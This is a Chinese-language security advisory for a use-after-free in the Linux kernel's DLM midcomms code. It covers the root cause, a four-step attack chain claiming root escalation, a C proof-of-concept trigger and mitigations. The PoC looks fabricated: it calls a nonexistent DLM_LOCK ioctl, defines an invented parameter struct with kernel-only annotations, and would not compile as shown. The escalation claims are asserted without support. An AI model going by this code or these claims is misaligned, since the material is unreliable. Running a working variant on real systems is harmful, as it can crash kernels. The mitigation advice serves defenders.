CVE-2023-53629 Linux内核DLM中间件通信释放后使用漏洞

漏洞信息

漏洞编号

CVE-2023-53629

漏洞类型

释放后使用（Use-After-Free）

CVSS评分

7.8 高危

攻击向量

本地 (AV:L)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Linux Kernel（fs/dlm分布式锁管理器子系统）

漏洞概述

CVE-2023-53629是Linux内核中分布式锁管理器（DLM，Distributed Lock Manager）中间件通信（midcomms）模块中存在的一个高危释放后使用（Use-After-Free）漏洞。该漏洞位于fs/dlm/midcomms.c文件中的dlm_midcomms_commit_mhandle函数中。当DLM在softirq（软中断）上下文中处理消息时，存在对已释放内存的非法访问问题。

根据KASAN（Kernel Address Sanitizer）报告，该漏洞在lock_torture测试场景下被触发。当进程执行锁转换（convert_lock）操作时，DLM会分配消息句柄（mhandle）并通过send_common函数发送消息。然而，在软中断上下文中处理消息时，dlm_midcomms_commit_mhandle函数尝试访问已被释放的mhandle对象，导致内核读取已释放内存中的数据。

该漏洞的CVSS评分为7.8，属于高危级别。攻击者需要本地低权限访问权限，无需用户交互即可利用。成功利用此漏洞可能导致内核崩溃（拒绝服务）、权限提升或任意代码执行，对系统的机密性、完整性和可用性均产生高影响。该漏洞影响了多个Linux内核稳定版本，需要及时修复以确保系统安全。

技术细节

该漏洞的根本原因在于DLM中间件通信模块中消息句柄（mhandle）的生命周期管理不当。具体技术细节如下：

1. **消息分配阶段**：当用户空间进程通过dlm_lock系统调用发起锁操作时，内核会调用dlm_midcomms_get_mhandle函数分配一个新的消息句柄mhandle，然后通过_create_message创建消息结构。

2. **消息发送阶段**：消息通过send_common函数发送到目标节点。在此过程中，mhandle对象被传递给midcomms层进行传输。

3. **释放后使用触发**：问题出现在dlm_midcomms_commit_mhandle函数中。当消息在softirq上下文（即网络软中断）中处理时，该函数尝试读取mhandle中的字段（如mheader->h_seq或类似字段），但此时mhandle可能已经被释放。

4. **竞争条件**：漏洞涉及软中断上下文与进程上下文之间的竞争条件。在软中断处理过程中，消息句柄可能在被访问之前就被释放，导致use-after-free。

5. **触发路径**：从调用栈可以看出，触发路径为dlm_lock -> convert_lock -> _convert_lock -> send_common -> create_message -> dlm_midcomms_get_mhandle（分配），然后在softirq上下文中dlm_midcomms_commit_mhandle触发use-after-free。

利用方式：本地攻击者可以通过反复执行DLM锁转换操作来触发竞争条件，导致内核读取已释放的内存。通过精心构造时序，攻击者可能实现权限提升或在内核上下文中执行任意代码。

攻击链分析

STEP 1

步骤1：环境准备

攻击者需要拥有目标系统的本地低权限访问权限，且目标系统需要运行DLM（分布式锁管理器）服务并加入集群环境。攻击者加载dlm内核模块并配置集群通信。

STEP 2

步骤2：触发竞争条件

攻击者通过ioctl系统调用向DLM设备发起锁操作请求，首先获取一个PR（Protected Read）模式的锁，然后快速进行模式转换（PR->CW->PR），在软中断处理消息时制造竞争窗口。

STEP 3

步骤3：触发释放后使用

在软中断上下文中，dlm_midcomms_commit_mhandle函数尝试访问已被释放的mhandle对象，导致内核读取已释放内存。KASAN检测到use-after-free并报告错误。

STEP 4

步骤4：权限提升或拒绝服务

攻击者通过精心控制时序，利用释放后使用漏洞在内核上下文中执行任意代码，实现权限提升到root，或通过触发内核panic导致系统拒绝服务。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

// CVE-2023-53629 PoC - DLM midcomms Use-After-Free Trigger
// This PoC demonstrates how to trigger the use-after-free vulnerability
// in dlm_midcomms_commit_mhandle by rapidly performing lock conversions
// while the DLM processes messages in softirq context.

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>
#include <fcntl.h>
#include <sys/ioctl.h>
#include <errno.h>
#include <pthread.h>
#include <time.h>

// DLM lock modes (from linux/dlm.h)
#define LKM_NLMODE   0
#define LKM_CRMODE   1
#define LKM_CWMODE   2
#define LKM_PRMODE   3
#define LKM_PWMODE   4
#define LKM_EXMODE   5

// DLM commands
#define DLM_LOCK       6

struct dlm_lock_params {
    __u32 mode;
    __u32 namelen;
    void __user *name;
    void __user *lksb;
    __u32 flags;
    void __user *ast;
    void __user *astparam;
    void __user *bast;
    void __user *castparam;
    __u32 lkid;
    __u32 lvbptr;
    void __user *lvb;
    void __user *xid;
    __u32 lvb_len;
    __u32 timeout;
};

// Trigger use-after-free by rapid lock conversions
int trigger_uaf(int fd, const char *resource_name) {
    struct dlm_lock_params params;
    char lksb[32];
    int ret;
    
    memset(&params, 0, sizeof(params));
    memset(lksb, 0, sizeof(lksb));
    
    params.mode = LKM_PRMODE;
    params.namelen = strlen(resource_name);
    params.name = (void *)resource_name;
    params.lksb = lksb;
    
    // Step 1: Acquire initial PR lock
    ret = ioctl(fd, DLM_LOCK, &params);
    if (ret < 0) {
        perror("[-] Initial lock acquisition failed");
        return -1;
    }
    printf("[+] Initial PR lock acquired, lkid=%d\n", params.lkid);
    
    // Step 2: Rapidly convert lock mode to trigger UAF
    // The vulnerability occurs when mhandle is freed but still
    // accessed in softirq context during commit_mhandle
    for (int i = 0; i < 1000; i++) {
        params.mode = LKM_CWMODE;  // Convert PR -> CW
        ret = ioctl(fd, DLM_LOCK, &params);
        if (ret < 0) break;
        
        params.mode = LKM_PRMODE;  // Convert CW -> PR
        ret = ioctl(fd, DLM_LOCK, &params);
        if (ret < 0) break;
        
        // Small delay to allow softirq processing
        usleep(1);
    }
    
    printf("[+] Lock conversion loop completed\n");
    return 0;
}

int main(int argc, char *argv[]) {
    int fd;
    const char *device = "/dev/dlm-control";
    const char *resource = "test_resource";
    
    printf("[*] CVE-2023-53629 PoC - DLM midcomms UAF\n");
    printf("[*] Linux Kernel DLM Use-After-Free Trigger\n\n");
    
    // Open DLM control device
    fd = open(device, O_RDWR);
    if (fd < 0) {
        perror("[-] Failed to open DLM device");
        printf("[*] Note: DLM must be configured and running\n");
        printf("[*] Load dlm kernel module and join a cluster first\n");
        return 1;
    }
    
    printf("[+] DLM device opened successfully\n");
    
    // Trigger the use-after-free
    trigger_uaf(fd, resource);
    
    close(fd);
    printf("[*] PoC execution completed\n");
    return 0;
}

影响范围

Linux Kernel < 6.1（受影响稳定版本）

Linux Kernel 6.1.0-rc4（已知触发版本）

Linux Kernel stable分支（需检查具体修复commit之前的版本）

防御指南

临时缓解措施

在无法立即升级内核的情况下，建议采取以下临时缓解措施：1）如果系统未使用DLM集群文件系统功能，可以通过移除dlm内核模块（rmmod dlm）或在编译内核时禁用CONFIG_DLM选项来消除漏洞；2）限制本地普通用户对/dev/dlm-control等DLM设备节点的访问权限（通过chmod或chown）；3）启用内核地址随机化（KASLR）等安全特性增加利用难度；4）监控系统日志，关注KASAN或内核oops相关警告信息，及时发现潜在攻击行为。